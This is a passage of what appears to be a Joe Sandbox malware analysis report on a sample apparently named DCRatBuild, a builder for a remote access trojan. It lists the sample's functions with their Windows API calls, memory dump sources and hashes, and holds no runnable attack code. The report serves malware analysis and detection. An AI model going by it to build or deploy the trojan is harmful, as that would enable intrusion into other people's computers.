Instruction Fuzzy Hash: 83E092351412196BDB115F60DC85FDA37ECFB08781F8840A1B944D2150EB71DEC4DA51

Function 00B2AC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,00B42641,000000FF), ref: 00B2ACB0
CoUninitialize.COMBASE(?,?,?,?,00B42641,000000FF), ref: 00B2ACB5

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 9d52e7460a0ea90cce58779a128a3b0de4543598b48c2397dbf43547b644452b
Instruction ID: 8b24aa641f97c6a9f21aed83356493691d8e270839af1ba366bdfa70172cd904
Opcode Fuzzy Hash: 9d52e7460a0ea90cce58779a128a3b0de4543598b48c2397dbf43547b644452b
Instruction Fuzzy Hash: E9E06572504650EFCB009F59DC46B45FBE8FB48F20F044265F41AD3760CF74A940CA94

Function 00B1A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,00B1A23A,?,00B1755C,?,?,?,?), ref: 00B1A254

Part of subcall function 00B1BB03: _wcslen.LIBCMT ref: 00B1BB27

GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00B1A23A,?,00B1755C,?,?,?,?), ref: 00B1A280

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 2c23f848f6a01f0ea8b091564e00f2c7b29d8d2b8a042ef3b4b37d6b0e2a2b7f
Instruction ID: 3970b107c7bfda4ece0cbe2e90933b0f8102fd63f717294b701fc7c871f92056
Opcode Fuzzy Hash: 2c23f848f6a01f0ea8b091564e00f2c7b29d8d2b8a042ef3b4b37d6b0e2a2b7f
Instruction Fuzzy Hash: EBE092355001245BCB11EB64DC05BD9B7E8EB097E1F4442A1FD54E3290DB70DE84CAE0

Function 00B2DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00B2DEEC

Part of subcall function 00B14092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B140A5

SetDlgItemTextW.USER32(00000065,?), ref: 00B2DF03

Part of subcall function 00B2B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B2B579
Part of subcall function 00B2B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B2B58A
Part of subcall function 00B2B568: IsDialogMessageW.USER32(00010484,?), ref: 00B2B59E
Part of subcall function 00B2B568: TranslateMessage.USER32(?), ref: 00B2B5AC
Part of subcall function 00B2B568: DispatchMessageW.USER32(?), ref: 00B2B5B6

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
String ID:
API String ID: 2718869927-0
Opcode ID: c3002433b9378ed52e2ec1ec3bbbd8db51aaddc0a5655584b764805f1dc9bea8
Instruction ID: 1885a1d6d7476b69a056a893ea93a4048e523d59752ac67440a14671c4b06eef
Opcode Fuzzy Hash: c3002433b9378ed52e2ec1ec3bbbd8db51aaddc0a5655584b764805f1dc9bea8
Instruction Fuzzy Hash: 30E09B7141035866DF01A761DC06FDE37EC5B05785F4404D1B644EB1A2DE78E6508761

Function 00B2081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B20836
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B1F2D8,Crypt32.dll,00000000,00B1F35C,?,?,00B1F33E,?,?,?), ref: 00B20858

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 0a78ef212ee7159144eb594eb95806c8b02a1b1cfdffedefea1e3e5292556d83
Instruction ID: c3cfd5832a142870f61aa25c90a2501ca5b0696af601fe667616fe0ee726e283
Opcode Fuzzy Hash: 0a78ef212ee7159144eb594eb95806c8b02a1b1cfdffedefea1e3e5292556d83
Instruction Fuzzy Hash: C1E01A768101286ADB11ABA5AC49FDA7BECFF09791F0800A5B649E2104DA74DB848BA0

Function 00B2A3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00B2A3DA
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00B2A3E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: a41845ca71533f08a5ebfd9a68d5e4be0b9bf532b99f394a5f6361c667541651
Instruction ID: e7e0eb348c1887ff0f224da2140fe3c69c95885f80ec75f7f59ad6d19e9c01a3
Opcode Fuzzy Hash: a41845ca71533f08a5ebfd9a68d5e4be0b9bf532b99f394a5f6361c667541651
Instruction Fuzzy Hash: 0BE01271500228EFCB10DF56D54579DBBF8EF05360F10C49AE85A97201E374AF05DB91

Function 00B32B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B32BAA
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00B32BB5

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: 304e2a576d06c811d3f2a81696248919c98a0ad6eb41bc681b0a760ff2319c0d
Instruction ID: 4c250bb77f57f4faab6f5d507fe25104043f46b2963a0a7ffca58fa0abeb9c99
Opcode Fuzzy Hash: 304e2a576d06c811d3f2a81696248919c98a0ad6eb41bc681b0a760ff2319c0d
Instruction Fuzzy Hash: EDD0223C154300186C142FB03A0384AB3C5FD42F71FF052DAF430864D1FE208040A021

Function 00B112F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00B11306
ShowWindow.USER32(00000000), ref: 00B1130D

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 0474157019c10c918973dd8039bb02db6ca9404d57a80197d5aaaf51a8276636
Instruction ID: 0b45e2da8c2a4a8ba8e1d69ae155b6f0e9c126dc252e58ae810bedefffe03455
Opcode Fuzzy Hash: 0474157019c10c918973dd8039bb02db6ca9404d57a80197d5aaaf51a8276636
Instruction Fuzzy Hash: 14C0123205C200FECB010BB4DC09C2BBBE8ABA5712F04C908B0AAD2060CA38C190EB12

Function 00B11A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B11A09

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: b6b83e821cac73f2f6ae3a64ac047fcd411cd3f6be4973f49e4d3e261e3eb51b
Instruction ID: 547196a755eb0c332d9a7a91d1479adcdf8b18ddbde1a54772b31a9fa3d03b07
Opcode Fuzzy Hash: b6b83e821cac73f2f6ae3a64ac047fcd411cd3f6be4973f49e4d3e261e3eb51b
Instruction Fuzzy Hash: D9C1A030A042549BEF15CF6CD484BEA7BE5EF05310F4809F9EE469B296DB309984CB61

Function 00B13BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B13BBF

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 65a5ec298a703237180fc2fc36fb15e831aee48ba118cad9fea995cef2b9429a
Instruction ID: da6f376562edc9d50b9f28622a4750532683d8791e06b4decedcb0c101adce99
Opcode Fuzzy Hash: 65a5ec298a703237180fc2fc36fb15e831aee48ba118cad9fea995cef2b9429a
Instruction Fuzzy Hash: 7971D471500B859ECB25DB74C8559E7B7E9EF15700F8009AEE1AF87241EA3276C8DF11

Function 00B18284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B18289

Part of subcall function 00B113DC: __EH_prolog.LIBCMT ref: 00B113E1

Part of subcall function 00B1A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00B1A598

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: H_prolog$CloseFind
String ID:
API String ID: 2506663941-0
Opcode ID: df37d1d181aa9d35cdd7f0eaed8cd9f395021ddbb1610269f6785793b3e34138
Instruction ID: 6f1800785e70f11a9ba3b6fb649a6d118cbb102f3dbae572f2127b152b5842f7
Opcode Fuzzy Hash: df37d1d181aa9d35cdd7f0eaed8cd9f395021ddbb1610269f6785793b3e34138
Instruction Fuzzy Hash: C541A6719446589ADB21DB60DC55AEAB3E8FF00304F8404EAF15A97093EF756FC5CB50

Function 00B113E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B113E1

Part of subcall function 00B15E37: __EH_prolog.LIBCMT ref: 00B15E3C

Part of subcall function 00B1CE40: __EH_prolog.LIBCMT ref: 00B1CE45

Part of subcall function 00B1B505: __EH_prolog.LIBCMT ref: 00B1B50A

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 2f803fdce5fd2a677e207b2a0bc322131c1ebe3b7b2adad23b86d592281273b3
Instruction ID: c01ff053ac2896d137eb1702839f9631410dd100662c19fddeffbfa05e51bad7
Opcode Fuzzy Hash: 2f803fdce5fd2a677e207b2a0bc322131c1ebe3b7b2adad23b86d592281273b3
Instruction Fuzzy Hash: 01413DB0905B419EE724DF798885AE6FBE5BF29300F90496ED5FE83282C7316654CB10

Function 00B113DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B113E1

Part of subcall function 00B15E37: __EH_prolog.LIBCMT ref: 00B15E3C

Part of subcall function 00B1CE40: __EH_prolog.LIBCMT ref: 00B1CE45

Part of subcall function 00B1B505: __EH_prolog.LIBCMT ref: 00B1B50A

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 3657a9583d75753b69b7c61ff4ab0b03e7ff7bcce3bd77e6da97d79178fc0439
Instruction ID: 8de581c22d4a5b633c5bfa169c9f5b1c7fe01b29134b550f457a6b25e4a8fbce
Opcode Fuzzy Hash: 3657a9583d75753b69b7c61ff4ab0b03e7ff7bcce3bd77e6da97d79178fc0439
Instruction Fuzzy Hash: 0E413BB0905B409EE724DF798885AE6FBE5FF29300F90496ED5FE83282CB316654CB11

Function 00B2B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B2B098

Part of subcall function 00B113DC: __EH_prolog.LIBCMT ref: 00B113E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 0e9922becea23419a29c0a2cd7ec517472503f9953bcafa188ce637be9dd031a
Instruction ID: 80f6877b2766353b905fab7df67522377e3fb05f1c6d3eaff1c3dd95b2492189
Opcode Fuzzy Hash: 0e9922becea23419a29c0a2cd7ec517472503f9953bcafa188ce637be9dd031a
Instruction Fuzzy Hash: 77317C71C10259AECF15DFA9D891AEEBBF4AF09300F5044DEE409B7242DB35AE44CB61

Function 00B3AC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00B3ACF8

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: bc9b9a1a232cd5108bf379bf1100b0ab89c0ae38abecd46c2ec9297da28c7302
Instruction ID: 2727b97330498fe9c0bd6072b9d94c40fa8c0a16d2ba8291db585460dacd76f1
Opcode Fuzzy Hash: bc9b9a1a232cd5108bf379bf1100b0ab89c0ae38abecd46c2ec9297da28c7302
Instruction Fuzzy Hash: 2E110637A002256F9B229E28EC5099A77D5FBC5720F7642A0FCA5EB254DB30DD0187D2

Function 00B19215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B1921A

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 508ff6fdc86d273af1cc790e62319c094114305c482b47ddef86b3664282adad
Instruction ID: df19c529fe0f1e8464b18d4db8256dc2795ca5b1d1030e9b605c4d66ee006bae
Opcode Fuzzy Hash: 508ff6fdc86d273af1cc790e62319c094114305c482b47ddef86b3664282adad
Instruction Fuzzy Hash: B501A533900568ABCF11ABA8CC919DEB7B2FF89740F414595F816B7212DA34CD81C6E0

Function 00B33C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00B33C3F

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: b791e622245b8e633a20fd8e33c796cde27fc1d10e86851c9d6e7c00248d9f24
Instruction ID: 3cc39c9560ee8d6b2798791ed030ac4b7346448694afb8773d8becce233d0f22
Opcode Fuzzy Hash: b791e622245b8e633a20fd8e33c796cde27fc1d10e86851c9d6e7c00248d9f24
Instruction Fuzzy Hash: 6AF0A0362003169F9F129EA9EC00A9B77E9EF01F20B645264FA05E7190EB31DA20C790

Function 00B38E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00B3CA2C,00000000,?,00B36CBE,?,00000008,?,00B391E0,?,?,?), ref: 00B38E38

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4883c0dbe9c961e1edbd80251212240be3acf6dee349b17afef85d4b26a2c042
Instruction ID: 7654106fe351639cdf10a61bc6c5fb64c6f6774b1ebd13264f16cab8ea6abd6d
Opcode Fuzzy Hash: 4883c0dbe9c961e1edbd80251212240be3acf6dee349b17afef85d4b26a2c042
Instruction Fuzzy Hash: 2AE06D3264633567EA7236659C05B9B76C8EF427B4F3501E1BC5CAB091CFA0CE0082E3

Function 00B15ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B15AC2

Part of subcall function 00B1B505: __EH_prolog.LIBCMT ref: 00B1B50A

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 89b719549124d939c26dffdaa11be5020544515de31058baf2bc70c72192773f
Instruction ID: 40688687c4b80d31af8456b0e20dd781f14d3da69f5acb84821177295e2571bd
